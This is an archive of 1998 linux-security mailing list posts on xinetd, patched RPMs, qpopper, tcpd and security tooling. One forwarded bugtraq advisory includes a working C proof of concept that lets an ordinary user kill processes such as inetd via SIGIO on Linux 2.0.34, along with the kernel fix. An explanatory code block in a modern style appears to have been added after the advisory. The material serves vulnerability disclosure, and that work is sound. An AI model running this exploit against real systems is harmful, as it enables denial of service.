X-moderate: yes
Have you looked at xinetd? I have it running on our firewall and it
even allows you to bind services to a single interface. This way there
is no connect then disconnect as with tcp_wrappers.
-Rick
--
+-------------------------------------------+
| "No matter where you go...there you are." |
| -Buckaroo Banzai |
+-------------------------------------------+---------------------
ChapWin Consulting Inc. rick@chapwin.com
Red Lake Internet / Ear Falls Internet www.chapwin.net
Box 882 (807) 727-2606
Red Lake, ON P0V 2M0 FAX (807) 727-3594
------------------------------------------------------------------
Member: Northern Ontario Coalition of Internet Providers
------------------------------------------------------------------
From mail@mail.redhat.com Sun Jul 5 09:58:04 1998
Received: (qmail 14175 invoked from network); 5 Jul 1998 08:02:42 -0000
Received: from 3dyn101.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.101)
by mail2.redhat.com with SMTP; 5 Jul 1998 08:02:42 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id JAA03062
for <linux-security@redhat.com>; Sun, 5 Jul 1998 09:58:04 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA00900
for linux-security@redhat.com; Sun, 5 Jul 1998 10:02:42 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Sat Jul 4 13:42:09 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id BAA11923
for <wolff@dutepp0.et.tudelft.nl>; Sat, 4 Jul 1998 01:07:57 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id AAA20138 for
<r.e.wolff@BitWizard.nl>; Sat, 4 Jul 1998 00:56:42 +0200
Received: (qmail 4618 invoked by uid 501); 3 Jul 1998 23:07:52 -0000
Received: (qmail 4606 invoked from network); 3 Jul 1998 23:07:51 -0000
Received: from samiam.org (HELO ankh.samiam.org) (209.133.34.27)
by mail2.redhat.com with SMTP; 3 Jul 1998 23:07:51 -0000
Received: (qmail 13004 invoked by uid 1108); 3 Jul 1998 23:07:21 -0000
Date: Fri, 3 Jul 1998 16:07:21 -0700 (PDT)
From: samiam@mr.samiam.org
X-Sender: set@hello.samiam.org
To: linux-security@redhat.com
cc: bugtraq@netspace.org
Subject: RedHat broke termcap on the 4.2 libtermcap security upgrade
Message-ID: <Pine.LNX.3.95.980703160408.12984A-100000@ankh.samiam.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
RedHat broke termcap on the 4.2 libtermcap security upgrade.
Until RedHat gets a chance to fix it, fixed RPMS are here:
http://linux.samiam.org/blackdragon
- Sam
(Who is just glad that RedHat continues to keep RedHat 4.2 current with
security, even though it is an older distribution. In fact, their
support is the best support I have seen for a legacy distro)
"That which does not destroy me, makes me stronger" -- Nietzsche
From mail@mail.redhat.com Sun Jul 5 10:03:49 1998
Received: (qmail 17977 invoked from network); 5 Jul 1998 08:08:17 -0000
Received: from 3dyn101.delft.casema.net (HELO rosie.BitWizard.nl)
(root@195.96.104.101)
by mail2.redhat.com with SMTP; 5 Jul 1998 08:08:17 -0000
Received: from cave.BitWizard.nl (cave.BitWizard.nl [130.161.127.248])
by rosie.BitWizard.nl (8.8.5/8.8.5) with ESMTP id KAA03100
for <linux-security@redhat.com>; Sun, 5 Jul 1998 10:03:49 +0200
Received: (from wolff@localhost) by cave.BitWizard.nl (8.8.5/8.7.3) id KAA01052
for linux-security@redhat.com; Sun, 5 Jul 1998 10:08:27 +0200
Received: from dutepp0.et.tudelft.nl
by rosie.BitWizard.nl (fetchmail-4.2.9 POP3 run by wolff)
Approved: R.E.Wolff@BitWizard.nl
for <wolff@localhost> (single-drop); Wed Jul 1 08:03:15 1998
Received: from ferryman.ocn.nl (root@ferryman.ocn.nl [193.78.195.1])
by dutepp0.et.tudelft.nl (8.8.8/8.8.8/CARDIT) with SMTP id IAA01216
for <wolff@dutepp0.et.tudelft.nl>; Wed, 1 Jul 1998 08:04:42 +0200 (MET
DST)
Received: from mail2.redhat.com (mail2.redhat.com [199.183.24.247]) by
ferryman.ocn.nl (8.6.13/8.6.9) with SMTP id HAA18000 for
<r.e.wolff@BitWizard.nl>; Wed, 1 Jul 1998 07:53:29 +0200
Received: (qmail 31343 invoked by uid 501); 1 Jul 1998 06:04:37 -0000
Received: (qmail 9933 invoked from network); 1 Jul 1998 05:35:24 -0000
Received: from duzzit.interhdl.com (205.179.46.25)
by mail2.redhat.com with SMTP; 1 Jul 1998 05:35:24 -0000
Received: (qmail 20024 invoked by uid 500); 1 Jul 1998 05:35:23 -0000
Date: Tue, 30 Jun 1998 22:35:22 -0700 (PDT)
From: Ira Abramov <ira@scso.com>
X-Sender: ira@izzy.interhdl.com
cc: linux-security@redhat.com
Subject: [linux-security] Re: Patched Qpopper2.5 release Notification. (fwd)
In-Reply-To: <Pine.LNX.3.96.980630173830.3172B-100000@jp-gp.vsi.nl>
Message-ID: <Pine.LNX.3.95.980630223342.19866A-100000@izzy.interhdl.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Status: RO
On Tue, 30 Jun 1998, Jan-Philip Velders wrote:
> well, swift response!
> Qualcomm has a patched qpopper (2.5)
read bugtraq again, it already sprung a leak :-(
From mail@mail.redhat.com Sun Jul 5 10:05:24 1998
Date: Thu, 2 Jul 1998 11:03:32 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: linux-security@redhat.com
Subject: Serious Linux 2.0.34 security problem (fwd)
Message-ID: <Pine.BOO.3.96.980702110321.7217E-100000@thing.annexgrp.org>
Organization: Annex Group (Bangladesh)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Status: RO
---------- Forwarded message ----------
Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious Linux 2.0.34 security problem
I just saw this mentioned on linux-kernel and confirmed it;
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int s, p;

    if (argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        exit(0);
    } else {
        p = atoi(argv[1]);
    }
    fcntl(0, F_SETOWN, p);
    s = fcntl(0, F_GETFL, 0);
    fcntl(0, F_SETFL, s | O_ASYNC);
    printf("Sending SIGIO - press enter.\n");
    getchar();
    fcntl(0, F_SETFL, s & ~O_ASYNC);
    printf("SIGIO send attempted.\n");
    return 0;
}
This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO. Very bad.
The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.
David.
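As an added illustration (not David's code and not the kernel source), here is a constructed C model of the ownership test that send_sigio() is described as getting wrong, with the "!euid" and "euid" forms side by side; the struct, function names and sample ids are made up for the demonstration.

```c
/*
 * Constructed model of the send_sigio() ownership check discussed in
 * the message above.  It is NOT fs/fcntl.c: struct, function names and
 * the sample ids are hypothetical, chosen to show what flipping
 * "!euid" to "euid" changes.
 *
 * Policy being modelled (the rule kill(2) applies): a sender may
 * deliver the signal if it is privileged (effective uid 0) or if one
 * of its ids equals the target's real or saved uid.
 */
#include <stdio.h>

struct task_model {          /* hypothetical stand-in for task_struct */
    const char *comm;        /* process name, for the demo printout */
    unsigned int uid;        /* real uid of the target */
    unsigned int suid;       /* saved uid of the target */
};

/* 1 when the sender (uid, euid) shares an id with the target. */
static int ids_match(unsigned int uid, unsigned int euid,
                     const struct task_model *t)
{
    return euid == t->suid || euid == t->uid ||
           uid  == t->suid || uid  == t->uid;
}

/* Buggy form: because of "!euid" only a root sender is ever subjected
 * to the id comparison, so an unprivileged sender is never refused.
 * Returns 1 if the signal would be delivered. */
int sigio_allowed_buggy(unsigned int uid, unsigned int euid,
                        const struct task_model *t)
{
    if (!euid && !ids_match(uid, euid, t))
        return 0;           /* refused: this is root being blocked */
    return 1;
}

/* Fixed form: the comparison applies to every non-root sender and
 * root (euid 0) skips it.  Returns 1 if the signal would be delivered. */
int sigio_allowed_fixed(unsigned int uid, unsigned int euid,
                        const struct task_model *t)
{
    if (euid && !ids_match(uid, euid, t))
        return 0;           /* refused: unprivileged, no id in common */
    return 1;
}

int main(void)
{
    /* Constructed sample targets and senders. */
    const struct task_model inetd = { "inetd", 0, 0 };
    const struct task_model shell = { "user-shell", 501, 501 };
    const struct task_model *target[] = { &inetd, &shell };
    struct { const char *who; unsigned int uid, euid; } sender[] = {
        { "uid 501 user", 501, 501 },
        { "root",         0,   0   },
    };

    printf("%-14s %-12s %-6s %-6s\n", "sender", "target", "buggy", "fixed");
    for (unsigned i = 0; i < 2; i++)
        for (unsigned j = 0; j < 2; j++)
            printf("%-14s %-12s %-6d %-6d\n", sender[i].who, target[j]->comm,
                   sigio_allowed_buggy(sender[i].uid, sender[i].euid, target[j]),
                   sigio_allowed_fixed(sender[i].uid, sender[i].euid, target[j]));
    return 0;
}
```

The table shows the inversion: in the buggy form the uid 501 sender may signal inetd while root is refused for the user's shell, and the fixed form gives the opposite, expected result.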
From mail@mail.redhat.com Sun Jul 5 10:06:02 1998
Date: Fri, 3 Jul 1998 17:37:12 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: Wietse Venema <wietse@porcupine.org>
cc: linux-security@redhat.com
Subject: [linux-security] Re: tcpd anomaly
In-Reply-To: <19980702115529.45875E0CF0@spike.porcupine.org>
Message-ID: <Pine.BOO.3.96.980703173541.11852A-100000@thing.annexgrp.org>
Organization: Annex Group (Bangladesh)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Thu, 2 Jul 1998, Wietse Venema wrote:
| P.S. Appending "&" to a "twist" command will screw it up: the shell
| will close the standard input of the twisted command, so it can't
| read from the network.
just wanted to add: I wasn't using TWIST when I had "&" at the
end. what I had was:
smbd: ALL: (/bin/echo "%u at %n (%a) to %d" | \
/bin/mail me) &
in /etc/hosts.deny
don't flame me, I don't use it anymore.
---
Annex
From mail@mail.redhat.com Sun Jul 5 22:51:24 1998
Date: Sun, 5 Jul 1998 12:00:57 +0200 (CEST)
From: Linux mailing list user <linux@windows95.sucks.eu.org>
X-Sender: linux@k6.bero
To: Annex <annex@thing.annexgrp.org>
cc: linux-security@redhat.com
Subject: [linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
In-Reply-To: <Pine.BOO.3.96.980702110321.7217E-100000@thing.annexgrp.org>
Message-ID: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Thu, 2 Jul 1998, Annex wrote:
> I just saw this mentioned on linux-kernel and confirmed it;
[...]
> The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
> is approximately 139.
A much simpler fix is to update to a 2.0.35preX kernel (X>=3).
ftp://ftp.uk.linux.org/pub/linux/alan/2.0.35pre/
LLaP
bero
---
Windows 98 supports real multitasking - it can boot and crash simultaneously.
***
Anyone sending unwanted advertising e-mail to this address will be charged
$25 for network traffic and computing time. By extracting my address from
this message or its header, you agree to these terms.
From mail@mail.redhat.com Mon Jul 6 07:53:42 1998
Date: Sun, 5 Jul 1998 23:40:15 -0400 (EDT)
From: Jon Lewis <jlewis@inorganic5.fdt.net>
X-Sender: jlewis@tarkin.fdt.net
Reply-To: Jon Lewis <jlewis@inorganic5.fdt.net>
To: Linux mailing list user <linux@windows95.sucks.eu.org>
cc: Annex <annex@thing.annexgrp.org>, linux-security@redhat.com
Subject: [linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
In-Reply-To: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
Message-ID: <Pine.LNX.3.95.980705233216.790c-100000@tarkin.fdt.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
On Sun, 5 Jul 1998, Linux mailing list user wrote:
> > The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
> > is approximately 139.
>
> A much simpler fix is to update to a 2.0.35preX kernel (X>=3).
Actually, this is such a trivial bug to fix, that for many it probably
makes more sense to edit fs/fcntl.c and recompile rather than subject
themselves to the latest pre-release kernel...unless they like testing
pre-releases.
Just out of curiosity...word of this broke in linux-kernel and bugtraq in
the last days of June. Were the linux-security moderators away on
holiday, or do they live in a time zone several days behind the rest of
the world?
[mod: Moderators have other stuff to do besides keeping an eye on
linux-security. I've actually been pretty busy lately: I currently
have three clients shouting that they want stuff done NOW. Anyway, I
still try to find the time to moderate linux-security once a day.
But this doesn't have anything to do with what you mention: I don't go
and find stuff on Linux-kernel and forward it here. I let someone else
do that. So if you see something on another mailing list, and think
it's relevant, go ahead and forward it.
Regards,
Roger Wolff
Your Moderator. ]
------------------------------------------------------------------
Jon Lewis <jlewis@fdt.net> | Spammers will be winnuked or
Network Administrator | drawn and quartered...whichever
Florida Digital Turnpike | is more convenient.
______http://inorganic5.fdt.net/~jlewis/pgp for PGP public key____
From mail@mail.redhat.com Wed Jul 8 10:27:34 1998
Date: Wed, 8 Jul 1998 00:27:40 -0600 (MDT)
From: <seifried@seifried.org>
To: linux-security@redhat.com
Subject: ANNOUNCE: WinAudlog, centralized logfile checking - forward from bugtraq
In-Reply-To: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
Message-ID: <Pine.LNX.3.96.980708002527.1222A-100000@gateway-seifried.seifried.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
>From owner-bugtraq@NETSPACE.ORG Tue Jul 7 16:23:51 1998
DO YOU TRUST YOUR SYSTEM'S LOGS?
AudLog For Windows
Secure System Log Auditing
** FREE **
AUDLOG for Windows can be used to centralize the auditing of
distributed system logs in a network and certify that intruders did not
modify these logs.
When combined with SECURE SYSLOG, AudLog for Windows makes the
perfect package for SECURE LOGGING and AUDITING:
+ Easy to use graphical interface
+ AUDLOG downloads the logs generated by SECURE SYSLOG and verifies
their integrity
+ Allows for centralized auditing of an unlimited number of computers
in a network
+ PEO-1 cryptographic protocol for authenticating log-file integrity
+ 128-bit symmetric cryptography and a challenge-response protocol for
mutual authentication and confidentiality
+ Iconized security flags for log-files, hosts and groups of hosts
SECURE SYSLOG (ssyslog) is available for UNIX systems. Designed to
replace the syslog daemon, ssyslog implements a cryptographic protocol called
PEO-1 that allows the remote auditing of system logs. Auditing remains possible
even if an intruder gains superuser privileges on the system: the protocol
guarantees that the information logged before and during the intrusion
cannot be modified without the auditor (on a remote, trusted host) noticing.
What is AudLog for Windows?
~~~~~~~~~~~~~~~~~~~~~~~~~~
Audlog is a Win95/WinNT program that lets you manipulate logfiles from a
centralized point in your network. It works in conjunction with
Secure Syslog, a replacement for the UNIX syslogd that provides
cryptographic mechanisms to verify the integrity of the log files.
Secure Syslog provides a way of auditing the log files remotely, from
a trusted auditing host, using the provided UNIX utility called
'audlog'.
WinAudlog is the equivalent program for MS Windows; it features an
easy to use interface and the crypto algorithms required for authentication,
data transfer and integrity checking.
AUDLOG was developed in CORELABS, the research labs of CORE SDI S.A.,
and is now being distributed freely.
AUDLOG and SECURE SYSLOG are FREE.
To get the binary for Windows 95/NT go to:
-------------------------------------------
<http://www.core-sdi.com/audlog>
To get the source code and/or more information regarding ssyslog go to:
-----------------------------------------------------------------------
<http://www.core-sdi.com/ssyslog>
To get more information about CORELABS, SECURE LOGGING or PEO go to:
--------------------------------------------------------------------
<http://www.core-sdi.com/ENGLISH/CoreLabs>
--
==============================[ CORE Seguridad de la Informacion S.A. ]======
Ivan Arce
Technology Management          Email : ivan@core-sdi.com
Av. Santa Fe 2861 5to C        TE    : +54-1-821-1030
CP 1425                        FAX   : +54-1-821-1030
Buenos Aires, Argentina        Pager : +54-1-317-4157
=============================================================================
---end of message
-seifried
From mail@mail.redhat.com Wed Jul 8 10:27:30 1998
Date: Wed, 8 Jul 1998 00:33:41 -0600 (MDT)
From: <seifried@seifried.org>
To: linux-security@redhat.com
Subject: RedHat 5.X Security Book
In-Reply-To: <Pine.LNX.3.96.980705114733.220A-100000@k6.bero>
Message-ID:
<Pine.LNX.3.96.980708002750.1222B-100000@gateway-seifried.seifried.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
I was looking around for a book specifically on Linux security a week or
two ago, and couldn't find any. I wanted something Linux specific as
opposed to say O'Reilly's yellow safe book. Couldn't find any (not even at
our local computer book store which has 50+ linux titles). So I looked
through RedHat's site, the manuals that came with 4.1, 5.0, and 5.1;
nothing there. How odd I thought. So I started writing one, it is pretty
RedHat specific (as the subject of this email would imply). I would like
to get some feedback before I continue, a.k.a. is it worthwhile/useful?
http://www.seifried.org/redhat-security/
and in case the dns fall down go boom because we're moving them to a
newer, faster network connection (and the internic seems to be
responding somewhat slowly):
http://24.108.11.200/redhat-security/
Please don't flame me over details/etc, if you spot an error tell me and I
will fix it (I have been pretty careful though, it is supposed to be a
book on security =).
-seifried
From mail@mail.redhat.com Thu Jul 9 08:30:04 1998
Message-Id: <199807081440.KAA17970@pace.picante.com>
To: linux-security@redhat.com
Subject: [linux-security] Re: RedHat 5.X Security Book
In-reply-to: Your message of "Wed, 08 Jul 1998 00:33:41 MDT."
<Pine.LNX.3.96.980708002750.1222B-100000@gateway-seifried.seifried.org>
Date: Wed, 08 Jul 1998 10:39:59 -0300
From: Grant Taylor <gtaylor@picante.com>
X-moderate: yes
>>>>> <seifried@seifried.org> writes:
> I was looking around for a book specifically on Linux security a week or
> two ago, and couldn't find any. I wanted something Linux specific as
> opposed to say O'Reilly's yellow safe book.
There are actually Linux-specific details in Practical; I put some of
them there. They are not, however, distribution-specific.
> So I started writing one, it is pretty RedHat specific (as the
> subject of this email would imply). I would like to get some
> feedback before I continue, a.k.a. is it worthwhile/useful?
Well, I'd say that about 80% of what you'll end up with, if you
continue, will be a duplication of information found in Practical.
There's very little to Unix security that is specific to Linux. It's
also not at all clear that a Linux-specific security book would be
beneficial; without a good understanding of what's going on any
security implementation will fail, and the knowledge for such an
understanding is the same be it Linux, FreeBSD, Dec Unix, Solaris,
etc.
OTOH, your section on RPM is most certainly useful, although it's a
bit sketchy right now. And it'll be interesting to try and keep your
table up-to-date as holes are found and new packages are released.
Perhaps you should coordinate the data with one of the various RPM
listing web sites or one of the rpm manager tools.
--
Grant Taylor - gtaylor@picante.com - http://www.picante.com/~gtaylor/
Where do these people come from? Finger for PGP public key.